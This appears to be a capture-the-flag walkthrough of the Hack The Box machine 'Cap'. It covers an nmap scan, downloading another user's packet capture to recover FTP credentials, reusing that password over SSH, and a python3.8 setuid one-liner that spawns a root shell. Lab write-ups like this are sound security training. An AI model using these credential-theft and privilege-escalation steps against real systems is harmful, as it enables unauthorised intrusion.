Cap is an easy machine from Hack The Box.

Enumeration

nmap -sC -sV -oG nmap_basic_oG 10.10.10.245

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn

FTP, SSH, and HTTP. I’ll take a look at the webpage first.

It looks like a simple security dashboard.

Looking at the side menu, there’s a few different tools to use. The PCAP generator seems interesting.

After running the PCAP generator, it assigns it the filename 1.pcap and lets me download it. I wonder if there’s a 0.pcap…

There is! Let’s download that and open it in Wireshark.

There’s a few different data streams to look into, but the most revealing is an FTP login attempt. I can see a user, nathan, logging in to the FTP service and his password.

nathan:Buck3tH4TF0RM3!

So now I have credentials, let’s try them on the open SSH service.

Looks like a case of password reuse and now I’ve got a shell.

Privilege Escalation

After running linpeas to enumerate possible vectors for privilege escalation, I find some information about Linux capabilities.

Capabilities are a more granular way of assigning different privileges to certain processes or files. You can enumerate them with getcap -r / 2>/dev/null.

In this case, the python3.8 binary has been assigned the SUID capability, which means I can run it as the file’s owner.

The root user is the owner of this binary, so privilege escalation should be trivial.

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'